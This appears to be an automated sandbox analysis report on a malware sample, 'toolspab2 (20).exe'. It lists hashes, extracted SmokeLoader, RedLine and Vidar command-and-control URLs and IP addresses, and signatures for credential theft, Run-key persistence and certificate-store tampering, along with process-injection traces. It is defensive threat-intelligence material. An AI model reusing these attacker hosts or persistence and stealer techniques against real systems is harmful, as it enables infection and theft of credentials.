Overview
overview
10Static
static
toolspab2 (1).exe
windows7_x64
10toolspab2 (1).exe
windows10_x64
10toolspab2 (10).exe
windows7_x64
10toolspab2 (10).exe
windows10_x64
10toolspab2 (11).exe
windows7_x64
10toolspab2 (11).exe
windows10_x64
10toolspab2 (12).exe
windows7_x64
10toolspab2 (12).exe
windows10_x64
10toolspab2 (13).exe
windows7_x64
10toolspab2 (13).exe
windows10_x64
10toolspab2 (14).exe
windows7_x64
10toolspab2 (14).exe
windows10_x64
10toolspab2 (15).exe
windows7_x64
10toolspab2 (15).exe
windows10_x64
10toolspab2 (16).exe
windows7_x64
10toolspab2 (16).exe
windows10_x64
toolspab2 (17).exe
windows7_x64
10toolspab2 (17).exe
windows10_x64
10toolspab2 (18).exe
windows7_x64
10toolspab2 (18).exe
windows10_x64
10toolspab2 (19).exe
windows7_x64
10toolspab2 (19).exe
windows10_x64
10toolspab2 (2).exe
windows7_x64
10toolspab2 (2).exe
windows10_x64
10toolspab2 (20).exe
windows7_x64
10toolspab2 (20).exe
windows10_x64
10toolspab2 (21).exe
windows7_x64
10toolspab2 (21).exe
windows10_x64
10toolspab2 (22).exe
windows7_x64
10toolspab2 (22).exe
windows10_x64
10toolspab2 (23).exe
windows7_x64
10toolspab2 (23).exe
windows10_x64
10Resubmissions
12-07-2021 16:55
210712-cvz622xsbj 1010-07-2021 13:25
210710-pdfh7kft96 1009-07-2021 23:00
210709-hewxkm1xlj 1009-07-2021 16:08
210709-5ql27kyjqa 1009-07-2021 14:08
210709-pt977a4bhe 1008-07-2021 22:09
210708-3ypfnj5j7x 1008-07-2021 13:30
210708-4hsk7y9f2x 1008-07-2021 12:14
210708-8t5f9z9egj 10Analysis
-
max time kernel
118s -
max time network
155s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
08-07-2021 13:30
Static task
static1
Behavioral task
behavioral1
Sample
toolspab2 (1).exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
toolspab2 (1).exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
toolspab2 (10).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
toolspab2 (10).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
toolspab2 (11).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
toolspab2 (11).exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
toolspab2 (12).exe
Resource
win7v20210408
Behavioral task
behavioral8
Sample
toolspab2 (12).exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
toolspab2 (13).exe
Resource
win7v20210408
Behavioral task
behavioral10
Sample
toolspab2 (13).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
toolspab2 (14).exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
toolspab2 (14).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
toolspab2 (15).exe
Resource
win7v20210410
Behavioral task
behavioral14
Sample
toolspab2 (15).exe
Resource
win10v20210408
Behavioral task
behavioral15
Sample
toolspab2 (16).exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
toolspab2 (16).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
toolspab2 (17).exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
toolspab2 (17).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
toolspab2 (18).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
toolspab2 (18).exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
toolspab2 (19).exe
Resource
win7v20210408
Behavioral task
behavioral22
Sample
toolspab2 (19).exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
toolspab2 (2).exe
Resource
win7v20210408
Behavioral task
behavioral24
Sample
toolspab2 (2).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
toolspab2 (20).exe
Resource
win7v20210410
Behavioral task
behavioral26
Sample
toolspab2 (20).exe
Resource
win10v20210408
Behavioral task
behavioral27
Sample
toolspab2 (21).exe
Resource
win7v20210410
Behavioral task
behavioral28
Sample
toolspab2 (21).exe
Resource
win10v20210408
Behavioral task
behavioral29
Sample
toolspab2 (22).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
toolspab2 (22).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
toolspab2 (23).exe
Resource
win7v20210410
General
-
Target
toolspab2 (20).exe
-
Size
315KB
-
MD5
585c257e0b345b762e7cdc407d8f9da2
-
SHA1
ffee403d97b76c3460fc166b9d5ce1205cd216a5
-
SHA256
4a0ecbcf9b54ed1c9654eb9ee214a797f48c980c6d03a261f62fa9671a2733d6
-
SHA512
14d39a6cd1c6d912cae7c35e2a98affcd5a9c1df6b947c42de65344e08d34912b09ccac83f9d8c3213b4e3d555769801e8218cb3f4b970d1d08606ee5a454ba8
Malware Config
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
http://nusurtal4f.net/
http://netomishnetojuk.net/
http://escalivrouter.net/
http://nick22doom4.net/
http://wrioshtivsio.su/
http://nusotiso4.su/
http://rickkhtovkka.biz/
http://palisotoliso.net/
Extracted
redline
1
45.32.235.238:45555
Extracted
redline
agressor
65.21.122.45:8085
Extracted
vidar
39.4
824
https://sergeevih43.tumblr.com
-
profile_id
824
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral26/memory/2824-336-0x0000000002F20000-0x0000000003846000-memory.dmp family_glupteba behavioral26/memory/2824-339-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2228 3968 rUNdlL32.eXe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3352 3968 rUNdlL32.eXe 97 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral26/memory/3144-143-0x00000000022D0000-0x00000000022EB000-memory.dmp family_redline behavioral26/memory/3948-146-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral26/memory/3948-148-0x0000000000417E96-mapping.dmp family_redline behavioral26/memory/3144-150-0x00000000024B0000-0x00000000024C9000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral26/files/0x000400000001ab82-324.dat family_socelars behavioral26/files/0x000400000001ab82-323.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral26/memory/3056-268-0x0000000001FB0000-0x000000000204D000-memory.dmp family_vidar behavioral26/memory/3056-269-0x0000000000400000-0x00000000004AD000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Process not Found -
Executes dropped EXE 26 IoCs
pid Process 2840 3038.exe 2124 3385.exe 3144 3665.exe 3936 3FBC.exe 3868 3038.exe 4008 48B6.exe 3948 3038.exe 2244 527B.exe 3984 5A8B.exe 2752 B742.exe 3056 B7FE.exe 3140 BB8A.exe 1240 C83D.exe 3984 CD4F.exe 1764 XrZhy2.eXe 3976 CD4F.tmp 1636 B742.exe 3832 134 Vaporeondè_éçè_)))_.exe 2824 E089.exe 1220 EC42.exe 4152 F76F.exe 4632 irecord.exe 4680 irecord.tmp 4700 Caepyqewaxi.exe 4764 Kybewashico.exe 4904 I-Record.exe -
resource yara_rule behavioral26/files/0x00070000000155fd-247.dat vmprotect behavioral26/files/0x00070000000155fd-246.dat vmprotect behavioral26/memory/1240-248-0x0000000000400000-0x0000000000664000-memory.dmp vmprotect -
Deletes itself 1 IoCs
pid Process 2724 Process not Found -
Loads dropped DLL 14 IoCs
pid Process 1016 toolspab2 (20).exe 3936 3FBC.exe 2124 3385.exe 2124 3385.exe 2124 3385.exe 2124 3385.exe 2124 3385.exe 3976 CD4F.tmp 2064 regsvr32.exe 3056 B7FE.exe 3056 B7FE.exe 4904 I-Record.exe 4904 I-Record.exe 4904 I-Record.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 184 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8ee7440e-26f6-4fd7-800a-64fea4f46e22\\B742.exe\" --AutoStart" B742.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Vivudizhyly.exe\"" Process not Found -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C83D.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 195 api.2ip.ua 196 api.2ip.ua 218 ip-api.com 115 api.2ip.ua 116 api.2ip.ua 184 ipinfo.io 186 ipinfo.io -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2064 regsvr32.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 672 set thread context of 1016 672 toolspab2 (20).exe 75 PID 2840 set thread context of 3948 2840 3038.exe 85 PID 2752 set thread context of 1636 2752 B742.exe 111 -
Drops file in Program Files directory 30 IoCs
description ioc Process File created C:\Program Files (x86)\i-record\is-7S4PC.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-J7OEV.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-14LA8.tmp irecord.tmp File opened for modification C:\Program Files (x86)\i-record\I-Record.exe irecord.tmp File opened for modification C:\Program Files (x86)\i-record\avformat-53.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\swresample-0.dll irecord.tmp File created C:\Program Files (x86)\i-record\unins000.dat irecord.tmp File opened for modification C:\Program Files (x86)\i-record\avutil-51.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\postproc-52.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\swscale-2.dll irecord.tmp File created C:\Program Files (x86)\i-record\is-D3FJ8.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-PB3GF.tmp irecord.tmp File opened for modification C:\Program Files (x86)\i-record\avcodec-53.dll irecord.tmp File created C:\Program Files (x86)\i-record\is-QM9ER.tmp irecord.tmp File opened for modification C:\Program Files (x86)\i-record\unins000.dat irecord.tmp File created C:\Program Files\Uninstall Information\MHUYTWFGVU\irecord.exe Process not Found File created C:\Program Files\Uninstall Information\MHUYTWFGVU\irecord.exe.config Process not Found File opened for modification C:\Program Files (x86)\i-record\avdevice-53.dll irecord.tmp File created C:\Program Files (x86)\Windows Portable Devices\Vivudizhyly.exe.config Process not Found File created C:\Program Files (x86)\i-record\is-O65NG.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-L49TQ.tmp irecord.tmp File opened for modification C:\Program Files (x86)\i-record\AForge.Video.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll irecord.tmp File created C:\Program Files (x86)\Windows Portable Devices\Vivudizhyly.exe Process not Found File created C:\Program Files (x86)\i-record\is-B7J3V.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-NLDI5.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-633E5.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-U39BA.tmp irecord.tmp File opened for modification C:\Program Files (x86)\i-record\avfilter-2.dll irecord.tmp File created C:\Program Files (x86)\i-record\is-UTASP.tmp irecord.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (20).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3FBC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3FBC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3FBC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (20).exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (20).exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 B7FE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString B7FE.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4440 timeout.exe -
Kills process with taskkill 3 IoCs
pid Process 3504 taskkill.exe 4232 taskkill.exe 4816 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Process not Found -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 B742.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e B742.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 185 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 189 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1016 toolspab2 (20).exe 1016 toolspab2 (20).exe 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2724 Process not Found -
Suspicious behavior: MapViewOfSection 20 IoCs
pid Process 1016 toolspab2 (20).exe 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 3936 3FBC.exe 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found 2724 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeDebugPrivilege 3948 3038.exe Token: SeDebugPrivilege 3144 3665.exe Token: SeDebugPrivilege 4008 48B6.exe Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeDebugPrivilege 3504 taskkill.exe Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeManageVolumePrivilege 1240 C83D.exe Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found Token: SeCreatePagefilePrivilege 2724 Process not Found Token: SeShutdownPrivilege 2724 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4680 irecord.tmp -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 2724 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 672 wrote to memory of 1016 672 toolspab2 (20).exe 75 PID 672 wrote to memory of 1016 672 toolspab2 (20).exe 75 PID 672 wrote to memory of 1016 672 toolspab2 (20).exe 75 PID 672 wrote to memory of 1016 672 toolspab2 (20).exe 75 PID 672 wrote to memory of 1016 672 toolspab2 (20).exe 75 PID 672 wrote to memory of 1016 672 toolspab2 (20).exe 75 PID 2724 wrote to memory of 2840 2724 Process not Found 79 PID 2724 wrote to memory of 2840 2724 Process not Found 79 PID 2724 wrote to memory of 2840 2724 Process not Found 79 PID 2724 wrote to memory of 2124 2724 Process not Found 81 PID 2724 wrote to memory of 2124 2724 Process not Found 81 PID 2724 wrote to memory of 2124 2724 Process not Found 81 PID 2724 wrote to memory of 3144 2724 Process not Found 82 PID 2724 wrote to memory of 3144 2724 Process not Found 82 PID 2724 wrote to memory of 3144 2724 Process not Found 82 PID 2840 wrote to memory of 3868 2840 3038.exe 83 PID 2840 wrote to memory of 3868 2840 3038.exe 83 PID 2840 wrote to memory of 3868 2840 3038.exe 83 PID 2724 wrote to memory of 3936 2724 Process not Found 84 PID 2724 wrote to memory of 3936 2724 Process not Found 84 PID 2724 wrote to memory of 3936 2724 Process not Found 84 PID 2840 wrote to memory of 3948 2840 3038.exe 85 PID 2840 wrote to memory of 3948 2840 3038.exe 85 PID 2840 wrote to memory of 3948 2840 3038.exe 85 PID 2724 wrote to memory of 4008 2724 Process not Found 86 PID 2724 wrote to memory of 4008 2724 Process not Found 86 PID 2724 wrote to memory of 4008 2724 Process not Found 86 PID 2840 wrote to memory of 3948 2840 3038.exe 85 PID 2840 wrote to memory of 3948 2840 3038.exe 85 PID 2840 wrote to memory of 3948 2840 3038.exe 85 PID 2840 wrote to memory of 3948 2840 3038.exe 85 PID 2840 wrote to memory of 3948 2840 3038.exe 85 PID 2724 wrote to memory of 2244 2724 Process not Found 87 PID 2724 wrote to memory of 2244 2724 Process not Found 87 PID 2724 wrote to memory of 2244 2724 Process not Found 87 PID 2724 wrote to memory of 3984 2724 Process not Found 88 PID 2724 wrote to memory of 3984 2724 Process not Found 88 PID 2724 wrote to memory of 3984 2724 Process not Found 88 PID 2724 wrote to memory of 1092 2724 Process not Found 89 PID 2724 wrote to memory of 1092 2724 Process not Found 89 PID 2724 wrote to memory of 1092 2724 Process not Found 89 PID 2724 wrote to memory of 1092 2724 Process not Found 89 PID 2724 wrote to memory of 816 2724 Process not Found 90 PID 2724 wrote to memory of 816 2724 Process not Found 90 PID 2724 wrote to memory of 816 2724 Process not Found 90 PID 2724 wrote to memory of 3816 2724 Process not Found 91 PID 2724 wrote to memory of 3816 2724 Process not Found 91 PID 2724 wrote to memory of 3816 2724 Process not Found 91 PID 2724 wrote to memory of 3816 2724 Process not Found 91 PID 2724 wrote to memory of 416 2724 Process not Found 92 PID 2724 wrote to memory of 416 2724 Process not Found 92 PID 2724 wrote to memory of 416 2724 Process not Found 92 PID 2724 wrote to memory of 1336 2724 Process not Found 93 PID 2724 wrote to memory of 1336 2724 Process not Found 93 PID 2724 wrote to memory of 1336 2724 Process not Found 93 PID 2724 wrote to memory of 1336 2724 Process not Found 93 PID 2724 wrote to memory of 2860 2724 Process not Found 94 PID 2724 wrote to memory of 2860 2724 Process not Found 94 PID 2724 wrote to memory of 2860 2724 Process not Found 94 PID 2724 wrote to memory of 1256 2724 Process not Found 95 PID 2724 wrote to memory of 1256 2724 Process not Found 95 PID 2724 wrote to memory of 1256 2724 Process not Found 95 PID 2724 wrote to memory of 1256 2724 Process not Found 95 PID 2724 wrote to memory of 500 2724 Process not Found 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1016
-
-
C:\Users\Admin\AppData\Local\Temp\3038.exeC:\Users\Admin\AppData\Local\Temp\3038.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\3038.exeC:\Users\Admin\AppData\Local\Temp\3038.exe2⤵
- Executes dropped EXE
PID:3868
-
-
C:\Users\Admin\AppData\Local\Temp\3038.exeC:\Users\Admin\AppData\Local\Temp\3038.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
C:\Users\Admin\AppData\Local\Temp\3385.exeC:\Users\Admin\AppData\Local\Temp\3385.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2124
-
C:\Users\Admin\AppData\Local\Temp\3665.exeC:\Users\Admin\AppData\Local\Temp\3665.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
C:\Users\Admin\AppData\Local\Temp\3FBC.exeC:\Users\Admin\AppData\Local\Temp\3FBC.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3936
-
C:\Users\Admin\AppData\Local\Temp\48B6.exeC:\Users\Admin\AppData\Local\Temp\48B6.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
C:\Users\Admin\AppData\Local\Temp\527B.exeC:\Users\Admin\AppData\Local\Temp\527B.exe1⤵
- Executes dropped EXE
PID:2244
-
